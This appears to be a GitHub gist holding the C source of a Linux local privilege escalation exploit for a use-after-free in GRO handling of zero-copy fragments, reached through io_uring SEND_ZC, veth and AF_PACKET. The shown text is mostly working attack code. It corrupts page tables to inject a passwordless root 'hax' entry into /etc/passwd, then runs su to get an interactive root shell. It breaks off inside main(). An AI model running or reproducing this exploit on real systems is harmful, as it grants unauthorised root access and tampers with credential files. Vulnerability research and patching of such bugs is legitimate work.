LPE via GRO managed-frag UAF

This article describes a Linux privilege escalation exploit (CVE-2024-0582) that targets a use-after-free vulnerability in the Generic Receive Offload (GRO) subsystem. The bug occurs when `skb_gro_receive()` copies zero-copy (ZC) fragment descriptors into a non-ZC GRO accumulator without properly incrementing page reference counts, leading to a refcount underflow when the accumulator is freed. The exploit chains this vulnerability with io_uring SEND_ZC operations and AF_PACKET sockets to achieve arbitrary physical memory read/write, ultimately allowing an unprivileged user to gain root access on Linux kernels 6.0 and later.

Created May 22, 2026 15:18 - - Save lcfr-eth/2566a5cef312c94a5ff8d62fa417955f to your computer and use it in GitHub Desktop. LPE via GRO managed-frag UAF This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters https://github.co/hiddenchars | / | | | gro frag.c — LPE via GRO managed-frag UAF io uring SEND ZC + veth | | | | | | The bug: skb gro receive copies frag descriptors from a ZC skb | | | SKBFL MANAGED FRAG REFS → no per-frag page refs into a non-ZC | | | GRO accumulator. When the accumulator is freed, skb release data | | | calls put page on each frag — including the stolen ones that never | | | had get page called. This gives us one extra put page per merged | | | ZC frag: a refcount underflow. | | | | | | Race window: between ZC notification page refs from GUP released | | | and GRO accumulator destruction put page fires , we clean up the | | | page's PTE and page-cache references. The vmsplice pipe reference | | | is the one "stolen" by the underflow — leaving a stale read handle | | | to a freed physical page. | | | | | | Exploitation: | | | 1. AF PACKET PACKET TX RING UNMOVABLE pages + vmsplice + io uring pin | | | 2. Fixed-buf SEND ZC → GRO merges managed frags into non-ZC seed | | | 3. munmap + unpin + close AF PACKET → pages freed to UNMOVABLE PCP | | | 4. pipe B writes 8 bytes → grabs freed page from UNMOVABLE PCP CAN MERGE | | | 5. pipe A read → put page frees pipe B's page back to UNMOVABLE PCP | | | 6. mmap /etc/passwd at 2MB-aligned slot → touch → PTE page allocated | | | from UNMOVABLE PCP → IS pipe B's freed page dirty pagetable | | | 7. tee pipe B → read PTE 0 → extract /etc/passwd PFN | | | 8. CAN MERGE write to pipe B → crafted PTE 1 RW, same PFN | | | 9. Write through crafted PTE → hardware walk bypasses VMA check | | | 10. su hax → root | | | | | | Affected: Linux 6.0+ unprivileged, requires io uring | | | Fixed by: 4db79a322db8 "net: gro: don't merge zcopy skbs" | | | | | | Tested: Ubuntu 24.04 | | | Compile: gcc -Wall -O2 -o gro lpe gro lpe.c -static -lutil | | | / | | | define GNU SOURCE | | | include <arpa/inet.h | | | include <errno.h | | | include <fcntl.h | | | include <linux/io uring.h | | | include <poll.h | | | include <pty.h | | | include <sched.h | | | include <signal.h | | | include <stdint.h | | | include <stdio.h | | | include <stdlib.h | | | include <string.h | | | include <sys/mman.h | | | include <sys/socket.h | | | include <sys/syscall.h | | | include <sys/uio.h | | | include <sys/wait.h | | | include <termios.h | | | include <linux/if packet.h | | | include <unistd.h | | | include <netinet/tcp.h | | | ifndef IORING OP SEND | | | define IORING OP SEND 26 | | | endif | | | ifndef IORING OP SEND ZC | | | define IORING OP SEND ZC 47 | | | endif | | | ifndef IORING RECVSEND FIXED BUF | | | define IORING RECVSEND FIXED BUF 1U << 2 | | | endif | | | ifndef IORING CQE F NOTIF | | | define IORING CQE F NOTIF 1U << 3 | | | endif | | | define PAGE SIZE 4096 | | | define RING ENTRIES 64 | | | define NUM PAGES 1 | | | define BUF SIZE NUM PAGES PAGE SIZE | | | define VETH MTU 4148 | | | define VETH IP A "10.0.0.1" | | | define VETH IP B "10.0.0.2" | | | define LISTEN PORT 9999 | | | define PASSWD PATH "/etc/passwd" | | | define BACKUP PATH "/tmp/.gro passwd bak" | | | define PAYLOAD "hax::0:0::/root:/bin/sh\n" | | | define PAYLOAD LEN 24 | | | define PCP DRAIN PIPES 256 | | | define PMD SIZE 512 PAGE SIZE | | | struct uring { | | | int fd; | | | void sq ring, cq ring, sqes mem; | | | uint32 t sq head, sq tail, sq mask, sq array; | | | uint32 t cq head, cq tail, cq mask; | | | struct io uring cqe cqes; | | | struct io uring sqe sqes; | | | }; | | | static int uring setup struct uring r | | | { | | | struct io uring params p = {0}; | | | r- fd = syscall NR io uring setup, RING ENTRIES, &p ; | | | if r- fd < 0 return -1; | | | size t sq sz = p.sq off.array + p.sq entries sizeof uint32 t ; | | | size t cq sz = p.cq off.cqes + p.cq entries sizeof struct io uring cqe ; | | | size t sqe sz = p.sq entries sizeof struct io uring sqe ; | | | r- sq ring = mmap 0, sq sz, PROT READ|PROT WRITE, MAP SHARED|MAP POPULATE, | | | r- fd, IORING OFF SQ RING ; | | | r- cq ring = mmap 0, cq sz, PROT READ|PROT WRITE, MAP SHARED|MAP POPULATE, | | | r- fd, IORING OFF CQ RING ; | | | r- sqes mem = mmap 0, sqe sz, PROT READ|PROT WRITE, MAP SHARED|MAP POPULATE, | | | r- fd, IORING OFF SQES ; | | | if r- sq ring == MAP FAILED || r- cq ring == MAP FAILED || | | | r- sqes mem == MAP FAILED | | | return -1; | | | r- sq head = r- sq ring + p.sq off.head; | | | r- sq tail = r- sq ring + p.sq off.tail; | | | r- sq mask = r- sq ring + p.sq off.ring mask; | | | r- sq array = r- sq ring + p.sq off.array; | | | r- cq head = r- cq ring + p.cq off.head; | | | r- cq tail = r- cq ring + p.cq off.tail; | | | r- cq mask = r- cq ring + p.cq off.ring mask; | | | r- cqes = r- cq ring + p.cq off.cqes; | | | r- sqes = r- sqes mem; | | | return 0; | | | } | | | static struct io uring sqe uring get sqe struct uring r | | | { | | | uint32 t tail = r- sq tail; | | | uint32 t mask = r- sq mask; | | | struct io uring sqe sqe = &r- sqes tail & mask ; | | | r- sq array tail & mask = tail & mask; | | | memset sqe, 0, sizeof sqe ; | | | r- sq tail = tail + 1; | | | return sqe; | | | } | | | static int uring submit struct uring r, int wait nr | | | { | | | return syscall NR io uring enter, r- fd, | | | r- sq tail - r- sq head, wait nr, | | | wait nr ? IORING ENTER GETEVENTS : 0, NULL, 0 ; | | | } | | | static int uring peek cqe struct uring r, struct io uring cqe out | | | { | | | uint32 t head = r- cq head; | | | sync synchronize ; | | | if head = r- cq tail { | | | out = r- cqes head & r- cq mask ; | | | sync synchronize ; | | | r- cq head = head + 1; | | | return 0; | | | } | | | return -1; | | | } | | | static int uring wait cqes timeout struct uring r, int ms | | | { | | | struct pollfd pfd = { .fd = r- fd, .events = POLLIN }; | | | return poll &pfd, 1, ms ; | | | } | | | static int uring drain cqes struct uring r, int send ok, int notifs, int timeout ms | | | { | | | send ok = 0; | | | notifs = 0; | | | int total = 0; | | | for int round = 0; round < 50; round++ { | | | struct io uring cqe cqe; | | | while uring peek cqe r, &cqe == 0 { | | | total++; | | | if cqe.flags & IORING CQE F NOTIF | | | notifs ++; | | | else if cqe.res = 0 | | | send ok ++; | | | else | | | fprintf stderr, " CQE error: res=%d %s \n", | | | cqe.res, strerror -cqe.res ; | | | } | | | if uring wait cqes timeout r, timeout ms / 50 + 1 <= 0 | | | break; | | | } | | | return total; | | | } | | | static int write file const char path, const char data | | | { | | | int fd = open path, O WRONLY ; | | | if fd < 0 return -1; | | | int len = strlen data ; | | | int ret = write fd, data, len == len ? 0 : -1; | | | close fd ; | | | return ret; | | | } | | | / ---- receiver child: separate netns with veth1 TCP ---- / | | | static void child receiver int sync rd, int sync wr | | | { | | | char buf; | | | if unshare CLONE NEWNET < 0 exit 1 ; | | | void write sync wr, "R", 1 ; | | | if read sync rd, &buf, 1 = 1 exit 1 ; | | | void system "ip link set lo up" ; | | | char mtu cmd 64 ; | | | snprintf mtu cmd, sizeof mtu cmd , "ip link set veth1 mtu %d", VETH MTU ; | | | void system mtu cmd ; | | | void system "ip addr add " VETH IP B "/24 dev veth1" ; | | | void system "ip link set veth1 up" ; | | | void system "ethtool -K veth1 gro on 2 /dev/null" ; | | | int ls = socket AF INET, SOCK STREAM, 0 ; | | | int one = 1; | | | setsockopt ls, SOL SOCKET, SO REUSEADDR, &one, sizeof one ; | | | int rcvbuf = 4 1024 1024; | | | setsockopt ls, SOL SOCKET, SO RCVBUF, &rcvbuf, sizeof rcvbuf ; | | | struct sockaddr in addr = { | | | .sin family = AF INET, | | | .sin port = htons LISTEN PORT , | | | }; | | | inet pton AF INET, VETH IP B, &addr.sin addr ; | | | bind ls, void &addr, sizeof addr ; | | | listen ls, 1 ; | | | void write sync wr, "L", 1 ; | | | int s = accept ls, NULL, NULL ; | | | close ls ; | | | if s < 0 exit 1 ; | | | void write sync wr, "A", 1 ; | | | / Wait for parent to signal us to drain / | | | if read sync rd, &buf, 1 = 1 { close s ; exit 1 ; } | | | char rbuf 65536 ; | | | struct timeval tv = {.tv sec = 2}; | | | setsockopt s, SOL SOCKET, SO RCVTIMEO, &tv, sizeof tv ; | | | while recv s, rbuf, sizeof rbuf , 0 0 | | | ; | | | close s ; | | | void write sync wr, "D", 1 ; | | | exit 0 ; | | | } | | | / ---- backup / restore ---- / | | | static int do backup void | | | { | | | int src = open PASSWD PATH, O RDONLY ; | | | if src < 0 { perror "open passwd" ; return -1; } | | | int dst = open BACKUP PATH, O WRONLY|O CREAT|O TRUNC, 0600 ; | | | if dst < 0 { perror "create backup" ; close src ; return -1; } | | | char buf 4096 ; | | | ssize t n; | | | while n = read src, buf, sizeof buf 0 | | | void write dst, buf, n ; | | | close src ; | | | close dst ; | | | return 0; | | | } | | | static int do restore void | | | { | | | int src = open BACKUP PATH, O RDONLY ; | | | if src < 0 return -1; | | | int dst = open PASSWD PATH, O WRONLY|O TRUNC ; | | | if dst < 0 { close src ; return -1; } | | | char buf 4096 ; | | | ssize t n; | | | while n = read src, buf, sizeof buf 0 | | | void write dst, buf, n ; | | | close src ; | | | close dst ; | | | unlink BACKUP PATH ; | | | return 0; | | | } | | | / ---- pty relay for interactive root shell ---- / | | | static void relay pty int master | | | { | | | struct termios old tio, raw tio; | | | tcgetattr STDIN FILENO, &old tio ; | | | raw tio = old tio; | | | cfmakeraw &raw tio ; | | | tcsetattr STDIN FILENO, TCSANOW, &raw tio ; | | | fd set fds; | | | char buf 4096 ; | | | for ;; { | | | FD ZERO &fds ; | | | FD SET STDIN FILENO, &fds ; | | | FD SET master, &fds ; | | | if select master + 1, &fds, NULL, NULL, NULL < 0 break; | | | if FD ISSET master, &fds { | | | ssize t n = read master, buf, sizeof buf ; | | | if n <= 0 break; | | | void write STDOUT FILENO, buf, n ; | | | } | | | if FD ISSET STDIN FILENO, &fds { | | | ssize t n = read STDIN FILENO, buf, sizeof buf ; | | | if n <= 0 break; | | | void write master, buf, n ; | | | } | | | } | | | tcsetattr STDIN FILENO, TCSANOW, &old tio ; | | | } | | | / ---- trigger GRO UAF and corrupt page cache ---- / | | | static int do corrupt int done wr, int wait rd | | | { | | | uid t real uid = getuid ; | | | gid t real gid = getgid ; | | | cpu set t cpus; | | | CPU ZERO &cpus ; | | | CPU SET 0, &cpus ; | | | sched setaffinity 0, sizeof cpus , &cpus ; | | | / ---- enter user+net namespace ---- / | | | if unshare CLONE NEWUSER | CLONE NEWNET < 0 { | | | fprintf stderr, " - unshare: %s\n", strerror errno ; | | | return -1; | | | } | | | write file "/proc/self/setgroups", "deny" ; | | | char mapbuf 64 ; | | | snprintf mapbuf, sizeof mapbuf , "0 %d 1", real uid ; | | | write file "/proc/self/uid map", mapbuf ; | | | snprintf mapbuf, sizeof mapbuf , "0 %d 1", real gid ; | | | write file "/proc/self/gid map", mapbuf ; | | | / ---- veth pair ---- / | | | void system "ip link add veth0 type veth peer name veth1" ; | | | int p2c 2 , c2p 2 ; | | | void pipe p2c ; | | | void pipe c2p ; | | | pid t child = fork ; | | | if child < 0 return -1; | | | if child == 0 { | | | close p2c 1 ; close c2p 0 ; | | | child receiver p2c 0 , c2p 1 ; | | | exit 0 ; | | | } | | | close p2c 0 ; close c2p 1 ; | | | char sync; | | | void read c2p 0 , &sync, 1 ; | | | char cmd 256 ; | | | snprintf cmd, sizeof cmd , "ip link set veth1 netns %d", child ; | | | void system cmd ; | | | void system "ip link set lo up" ; | | | snprintf cmd, sizeof cmd , "ip link set veth0 mtu %d", VETH MTU ; | | | void system cmd ; | | | void system "ip addr add " VETH IP A "/24 dev veth0" ; | | | void system "ip link set veth0 up" ; | | | void system "ethtool -K veth0 tso off gso off gro off 2 /dev/null" ; | | | if system "tc qdisc add dev veth0 root netem delay 50ms" = 0 | | | fprintf stderr, " tc netem failed — packets won't be batched\n" ; | | | void write p2c 1 , "G", 1 ; | | | void read c2p 0 , &sync, 1 ; | | | fprintf stderr, " + veth pair ready MTU %d, netem 50ms, GRO on receiver \n", VETH MTU ; | | | / ---- TCP connect receiver is listening ---- / | | | int client = socket AF INET, SOCK STREAM, 0 ; | | | int one tcp = 1; | | | setsockopt client, SOL SOCKET, SO ZEROCOPY, &one tcp, sizeof one tcp ; | | | setsockopt client, IPPROTO TCP, TCP NODELAY, &one tcp, sizeof one tcp ; | | | int sndbuf = 2 1024 1024; | | | setsockopt client, SOL SOCKET, SO SNDBUF, &sndbuf, sizeof sndbuf ; | | | struct sockaddr in saddr = { | | | .sin family = AF INET, | | | .sin port = htons LISTEN PORT , | | | }; | | | inet pton AF INET, VETH IP B, &saddr.sin addr ; | | | if connect client, void &saddr, sizeof saddr < 0 { | | | fprintf stderr, " - TCP connect: %s\n", strerror errno ; | | | kill child, SIGKILL ; return -1; | | | } | | | / Wait for child to accept / | | | void read c2p 0 , &sync, 1 ; | | | fprintf stderr, " + TCP connection established\n" ; | | | / ---- create AF PACKET TX ring buffer UNMOVABLE pages ---- / | | | int pf = socket AF PACKET, SOCK RAW, 0 ; | | | if pf < 0 { | | | fprintf stderr, " - AF PACKET socket: %s\n", strerror errno ; | | | kill child, SIGKILL ; return -1; | | | } | | | struct tpacket req treq = { | | | .tp block size = PAGE SIZE, | | | .tp block nr = NUM PAGES, | | | .tp frame size = PAGE SIZE, | | | .tp frame nr = NUM PAGES, | | | }; | | | if setsockopt pf, SOL PACKET, PACKET TX RING, &treq, sizeof treq < 0 { | | | fprintf stderr, " - PACKET TX RING: %s\n", strerror errno ; | | | close pf ; kill child, SIGKILL ; return -1; | | | } | | | void zc buf = mmap NULL, BUF SIZE, PROT READ|PROT WRITE, | | | MAP SHARED|MAP POPULATE, pf, 0 ; | | | if zc buf == MAP FAILED { | | | fprintf stderr, " - AF PACKET mmap: %s\n", strerror errno ; | | | close pf ; kill child, SIGKILL ; return -1; | | | } | | | for int i = 0; i < NUM PAGES; i++ | | | memset char zc buf + i PAGE SIZE, 'A' + i, PAGE SIZE ; | | | fprintf stderr, " + AF PACKET TX ring at %p %d UNMOVABLE pages \n", zc buf, NUM PAGES ; | | | / ---- vmsplice pages into pipe stale read ref after free ---- / | | | int leak pipe 2 ; | | | if pipe leak pipe < 0 { | | | fprintf stderr, " - pipe: %s\n", strerror errno ; | | | kill child, SIGKILL ; return -1; | | | } | | | / make pipe large enough / | | | fcntl leak pipe 0 , F SETPIPE SZ, BUF SIZE 2 ; | | | struct iovec splice iov NUM PAGES ; | | | for int i = 0; i < NUM PAGES; i++ { | | | splice iov i .iov base = char zc buf + i PAGE SIZE; | | | splice iov i .iov len = PAGE SIZE; | | | } | | | ssize t spliced = vmsplice leak pipe 1 , splice iov, NUM PAGES, 0 ; | | | if spliced < 0 { | | | fprintf stderr, " - vmsplice: %s\n", strerror errno ; | | | kill child, SIGKILL ; return -1; | | | } | | | fprintf stderr, " + vmsplice'd %zd bytes into pipe stale ref \n", spliced ; | | | / ---- io uring + register buffer pins pages ---- / | | | struct uring ring; | | | if uring setup &ring < 0 { | | | fprintf stderr, " - io uring setup: %s\n", strerror errno ; | | | kill child, SIGKILL ; return -1; | | | } | | | struct iovec iov = { .iov base = zc buf, .iov len = BUF SIZE }; | | | if syscall NR io uring register, ring.fd, | | | IORING REGISTER BUFFERS, &iov, 1 < 0 { | | | fprintf stderr, " - REGISTER BUFFERS: %s\n", strerror errno ; | | | kill child, SIGKILL ; return -1; | | | } | | | fprintf stderr, " + registered %d-page buffer pinned, +1024 refcount each \n", NUM PAGES ; | | | / | | | Refcount per page: | | | AF PACKET 1 + mmap PTE 1 + pipe 1 + pin 1024 = 1027 | | | | | | After exploit: | | | GRO -1 + munmap -1 + unpin -1024 + close AF PACKET -1 = -1027 | | | Final: 0 → page freed, pipe A has stale ref UNMOVABLE PCP | | | / | | | / ---- submit seed + ZC sends ---- / | | | static char seed buf PAGE SIZE ; | | | memset seed buf, 'S', PAGE SIZE ; | | | fprintf stderr, " submitting seed + %d SEND ZC...\n", NUM PAGES ; | | | struct io uring sqe sqe = uring get sqe &ring ; | | | sqe- opcode = IORING OP SEND; | | | sqe- fd = client; | | | sqe- addr = unsigned long seed buf; | | | sqe- len = PAGE SIZE; | | | sqe- msg flags = MSG MORE; | | | sqe- user data = 99; | | | for int i = 0; i < NUM PAGES; i++ { | | | sqe = uring get sqe &ring ; | | | sqe- opcode = IORING OP SEND ZC; | | | sqe- fd = client; | | | sqe- addr = unsigned long zc buf + i PAGE SIZE; | | | sqe- len = PAGE SIZE; | | | sqe- ioprio = IORING RECVSEND FIXED BUF; | | | sqe- buf index = 0; | | | if i < NUM PAGES - 1 | | | sqe- msg flags = MSG MORE; | | | sqe- user data = 100 + i; | | | } | | | int submitted = uring submit &ring, 0 ; | | | if submitted < 0 { | | | fprintf stderr, " - submit: %s\n", strerror errno ; | | | kill child, SIGKILL ; return -1; | | | } | | | fprintf stderr, " + submitted %d SQEs 1 seed + %d ZC \n", submitted, NUM PAGES ; | | | / | | | RST race: close socket with SO LINGER 0 BEFORE netem releases clones. | | | TCP RST frees originals in retransmit queue, decrementing dataref on | | | each clone's shared info. After that, skb cloned clone returns FALSE | | | → veth's skb unclone is a no-op → GRO sees MANAGED FRAG REFS frags | | | without proper page refs → extra put page on free → refcount underflow. | | | / | | | usleep 5000 ; | | | struct linger ling = { .l onoff = 1, .l linger = 0 }; | | | setsockopt client, SOL SOCKET, SO LINGER, &ling, sizeof ling ; | | | close client ; | | | fprintf stderr, " + RST sent SO LINGER 0 , originals freed\n" ; | | | / Wait for netem 50ms + GRO + TCP delivery + skb free / | | | usleep 300000 ; | | | / Signal receiver to finish, collect its exit / | | | void write p2c 1 , "D", 1 ; | | | usleep 200000 ; | | | / Drain CQEs / | | | int send ok = 0, notifs = 0; | | | uring drain cqes &ring, &send ok, ¬ifs, 500 ; | | | fprintf stderr, " + CQEs: %d sends, %d notifs\n", send ok, notifs ; | | | kill child, SIGTERM ; | | | waitpid child, NULL, 0 ; | | | / ---- Phase 1: remove PTE mapping ---- / | | | fprintf stderr, " munmap AF PACKET ring remove PTE refs ...\n" ; | | | munmap zc buf, BUF SIZE ; | | | fprintf stderr, " waiting for RCU grace period...\n" ; | | | usleep 500000 ; | | | / Drain UNMOVABLE PCP so our freed pages land on top / | | | fprintf stderr, " draining UNMOVABLE PCP via pipe allocations...\n" ; | | | int drain pipes PCP DRAIN PIPES 2 ; | | | int drain count = 0; | | | for int i = 0; i < PCP DRAIN PIPES; i++ { | | | if pipe drain pipes i < 0 break; | | | char c = 'X'; | | | if write drain pipes i 1 , &c, 1 = 1 { | | | close drain pipes i 0 ; close drain pipes i 1 ; | | | break; | | | } | | | drain count++; | | | } | | | fprintf stderr, " + drained %d UNMOVABLE pages from PCP\n", drain count ; | | | / ---- Phase 2: unpin + close AF PACKET → pages freed to UNMOVABLE PCP ---- / | | | fprintf stderr, " unregistering buffer unpin ...\n" ; | | | syscall NR io uring register, ring.fd, IORING UNREGISTER BUFFERS, NULL, 0 ; | | | close ring.fd ; | | | fprintf stderr, " closing AF PACKET socket last ref dropped → pages freed ...\n" ; | | | close pf ; | | | fprintf stderr, " + %d pages freed to UNMOVABLE PCP pipe A has stale refs \n", NUM PAGES ; | | | / | | | ---- Phase 3: pipe B CAN MERGE — snatch freed UNMOVABLE page ---- | | | | | | pipe write allocates from UNMOVABLE PCP GFP HIGHUSER, no GFP MOVABLE . | | | Our freed AF PACKET pages are also UNMOVABLE → same PCP list → match. | | | Write 8 bytes one PTE entry so CAN MERGE append lands at offset 8 = PTE 1 . | | | / | | | int pipe B 2 ; | | | if pipe pipe B < 0 { | | | fprintf stderr, " - pipe B: %s\n", strerror errno ; | | | close leak pipe 0 ; close leak pipe 1 ; | | | return -1; | | | } | | | uint64 t filler = 0xDEADBEEFDEADBEEFULL; | | | ssize t written = write pipe B 1 , &filler, 8 ; | | | if written = 8 { | | | fprintf stderr, " - pipe B filler write: %zd\n", written ; | | | close leak pipe 0 ; close leak pipe 1 ; | | | close pipe B 0 ; close pipe B 1 ; | | | return -1; | | | } | | | fprintf stderr, " + pipe B: wrote 8-byte filler CAN MERGE, snatched UNMOVABLE page \n" ; | | | / | | | ---- Phase 4: free pipe B's page via pipe A stale refs ---- | | | | | | pipe A read → put page on the single stale vmsplice ref. | | | The page grabbed by pipe B : refcount 1 → 0 → freed back to UNMOVABLE PCP. | | | pipe B still has stale CAN MERGE buffer pointing to the freed page. | | | / | | | fprintf stderr, " reading pipe A stale refs → frees pipe B's page...\n" ; | | | char pipe data NUM PAGES PAGE SIZE ; | | | ssize t total read = 0; | | | while total read < ssize t sizeof pipe data { | | | ssize t n = read leak pipe 0 , pipe data + total read, | | | sizeof pipe data - total read ; | | | if n <= 0 break; | | | total read += n; | | | } | | | close leak pipe 0 ; | | | close leak pipe 1 ; | | | fprintf stderr, " + drained %zd bytes from pipe A\n", total read ; | | | / | | | ---- Phase 5: allocate PTE page from UNMOVABLE PCP ---- | | | | | | Map /etc/passwd MAP SHARED at a 2MB-aligned slot 0. | | | Touch it → page fault → kernel allocates PTE page from UNMOVABLE PCP. | | | PTE page IS pipe B's freed page. PTE 0 = PFN of /etc/passwd | flags. | | | Slot 1 base+PAGE SIZE has no VMA — we'll access it via crafted PTE. | | | Hardware PTE walk doesn't check VMAs; only page fault handler does. | | | / | | | void big = mmap NULL, 4 PMD SIZE, PROT NONE, | | | MAP PRIVATE | MAP ANONYMOUS, -1, 0 ; | | | if big == MAP FAILED { | | | fprintf stderr, " - reserve mmap: %s\n", strerror errno ; | | | close pipe B 0 ; close pipe B 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | uintptr t base addr = uintptr t big + PMD SIZE - 1 & ~ PMD SIZE - 1 ; | | | munmap big, 4 PMD SIZE ; | | | int passwd fd = open PASSWD PATH, O RDONLY ; | | | if passwd fd < 0 { | | | fprintf stderr, " - open %s: %s\n", PASSWD PATH, strerror errno ; | | | close pipe B 0 ; close pipe B 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | void slot0 = mmap void base addr, PAGE SIZE, PROT READ, | | | MAP SHARED | MAP FIXED, passwd fd, 0 ; | | | if slot0 == MAP FAILED { | | | fprintf stderr, " - mmap /etc/passwd: %s\n", strerror errno ; | | | close passwd fd ; close pipe B 0 ; close pipe B 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | fprintf stderr, " + /etc/passwd mapped at %p 2MB-aligned slot 0 \n", slot0 ; | | | volatile char touch = volatile char slot0; | | | void touch; | | | fprintf stderr, " + slot 0 touched — PTE page allocated from UNMOVABLE PCP\n" ; | | | / | | | ---- Phase 6: read PTE 0 via tee, write crafted PTE 1 ---- | | | | | | tee duplicates pipe B's buffer to a helper pipe without consuming it. | | | Read helper → get PTE 0 current physical page content, i.e. the PTE entry | | | the kernel wrote for /etc/passwd . Extract PFN. | | | Then CAN MERGE write to pipe B at offset 8 → overwrites PTE 1 with | | | crafted entry: same PFN but Present+RW+User+Accessed+Dirty. | | | / | | | int helper 2 ; | | | if pipe helper < 0 { | | | fprintf stderr, " - helper pipe: %s\n", strerror errno ; | | | munmap slot0, PAGE SIZE ; | | | close passwd fd ; close pipe B 0 ; close pipe B 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | ssize t teed = tee pipe B 0 , helper 1 , 8, 0 ; | | | if teed = 8 { | | | fprintf stderr, " - tee: %zd %s \n", teed, strerror errno ; | | | munmap slot0, PAGE SIZE ; | | | close passwd fd ; close pipe B 0 ; close pipe B 1 ; | | | close helper 0 ; close helper 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | uint64 t pte0 = 0; | | | if read helper 0 , &pte0, 8 = 8 { | | | fprintf stderr, " - read PTE 0 from helper: %s\n", strerror errno ; | | | munmap slot0, PAGE SIZE ; | | | close passwd fd ; close pipe B 0 ; close pipe B 1 ; | | | close helper 0 ; close helper 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | close helper 0 ; close helper 1 ; | | | fprintf stderr, " + PTE 0 = 0x%016lx\n", unsigned long pte0 ; | | | if pte0 & 1 { | | | fprintf stderr, " - PTE 0 not present — PTE page mismatch\n" ; | | | munmap slot0, PAGE SIZE ; | | | close passwd fd ; close pipe B 0 ; close pipe B 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | uint64 t pfn = pte0 & 0x000FFFFFFFFFF000ULL 12; | | | fprintf stderr, " + /etc/passwd PFN = 0x%lx phys 0x%lx \n", | | | unsigned long pfn, unsigned long pfn << 12 ; | | | / Craft PTE 1 : same PFN, Present+RW+User+Accessed+Dirty / | | | uint64 t crafted pte = pfn << 12 | 0x067; | | | fprintf stderr, " + crafted PTE 1 = 0x%016lx\n", unsigned long crafted pte ; | | | written = write pipe B 1 , &crafted pte, 8 ; | | | if written = 8 { | | | fprintf stderr, " - pipe B CAN MERGE write: %zd\n", written ; | | | munmap slot0, PAGE SIZE ; | | | close passwd fd ; close pipe B 0 ; close pipe B 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | fprintf stderr, " + PTE 1 written via CAN MERGE — dirty pagetable armed\n" ; | | | / Close drain pipes now that PTE is armed / | | | for int i = 0; i < drain count; i++ { | | | close drain pipes i 0 ; | | | close drain pipes i 1 ; | | | } | | | / | | | ---- Phase 7: write payload through crafted PTE ---- | | | | | | base+PAGE SIZE has no VMA but PTE 1 is Present+RW+User. | | | Hardware PTE walk succeeds → TLB loaded → write goes to /etc/passwd | | | physical page WITHOUT page fault → VMA check never happens. | | | / | | | void rw page = void base addr + PAGE SIZE ; | | | / Read current /etc/passwd content for payload construction / | | | char real passwd PAGE SIZE ; | | | memset real passwd, 0, PAGE SIZE ; | | | ssize t passwd len = pread passwd fd, real passwd, PAGE SIZE, 0 ; | | | if passwd len <= 0 { | | | fprintf stderr, " - pread %s: %s\n", PASSWD PATH, strerror errno ; | | | munmap slot0, PAGE SIZE ; | | | close passwd fd ; close pipe B 0 ; close pipe B 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | / Construct corrupted page: prepend payload before original content. | | | We must stay within i size — appending past EOF is invisible to read . / | | | char corrupt page PAGE SIZE ; | | | memset corrupt page, 0, PAGE SIZE ; | | | memcpy corrupt page, PAYLOAD, PAYLOAD LEN ; | | | int remaining = PAGE SIZE - PAYLOAD LEN; | | | if passwd len < remaining | | | remaining = passwd len; | | | memcpy corrupt page + PAYLOAD LEN, real passwd, remaining ; | | | fprintf stderr, " writing payload through crafted PTE at %p...\n", rw page ; | | | memcpy rw page, corrupt page, PAGE SIZE ; | | | fprintf stderr, " + write succeeded — /etc/passwd page cache corrupted \n" ; | | | / Verify / | | | close passwd fd ; | | | passwd fd = open PASSWD PATH, O RDONLY ; | | | char verify PAGE SIZE ; | | | memset verify, 0, PAGE SIZE ; | | | if passwd fd = 0 { | | | void read passwd fd, verify, PAGE SIZE ; | | | close passwd fd ; | | | } | | | if strstr verify, PAYLOAD { | | | fprintf stderr, " + VERIFIED — hax user injected into /etc/passwd \n" ; | | | void write done wr, "OK", 2 ; | | | char wait buf; | | | void read wait rd, &wait buf, 1 ; | | | munmap slot0, PAGE SIZE ; | | | close pipe B 0 ; close pipe B 1 ; | | | return 0; | | | } | | | fprintf stderr, " - corruption not visible in /etc/passwd\n" ; | | | fprintf stderr, " first 120 bytes: %.120s\n", verify ; | | | munmap slot0, PAGE SIZE ; | | | close pipe B 0 ; close pipe B 1 ; | | | void write done wr, "NO", 2 ; | | | return -1; | | | } | | | / ---- privilege escalation ---- / | | | static void do escalate void | | | { | | | fprintf stderr, " escalating privileges via su...\n" ; | | | int master; | | | pid t pid = forkpty &master, NULL, NULL, NULL ; | | | if pid < 0 { perror "forkpty" ; return; } | | | if pid == 0 { | | | execlp "su", "su", "hax", NULL ; | | | exit 1 ; | | | } | | | usleep 500000 ; | | | char buf 4096 ; | | | ssize t n; | | | struct timeval tv = {.tv sec = 2}; | | | fd set fds; | | | FD ZERO &fds ; | | | FD SET master, &fds ; | | | if select master + 1, &fds, NULL, NULL, &tv 0 { | | | n = read master, buf, sizeof buf - 1 ; | | | if n 0 { | | | buf n = '\0'; | | | if strstr buf, "Password" || strstr buf, "password" { | | | void write master, "\n", 1 ; | | | usleep 500000 ; | | | } | | | } | | | } | | | fprintf stderr, " restoring /etc/passwd...\n" ; | | | char restore cmd 256 ; | | | snprintf restore cmd, sizeof restore cmd , | | | "cp %s %s 2 /dev/null; rm -f %s\n", BACKUP PATH, PASSWD PATH, BACKUP PATH ; | | | void write master, restore cmd, strlen restore cmd ; | | | usleep 500000 ; | | | void write master, "id\n", 3 ; | | | usleep 300000 ; | | | FD ZERO &fds ; | | | FD SET master, &fds ; | | | tv.tv sec = 2; | | | if select master + 1, &fds, NULL, NULL, &tv 0 { | | | n = read master, buf, sizeof buf - 1 ; | | | if n 0 { | | | buf n = '\0'; | | | if strstr buf, "uid=0" { | | | fprintf stderr, " + got root dropping to interactive shell\n\n" ; | | | relay pty master ; | | | return; | | | } | | | } | | | } | | | fprintf stderr, " - escalation failed\n" ; | | | kill pid, SIGTERM ; | | | waitpid pid, NULL, 0 ; | | | } | | | int main void | | | { | | | fprintf stderr, "=== 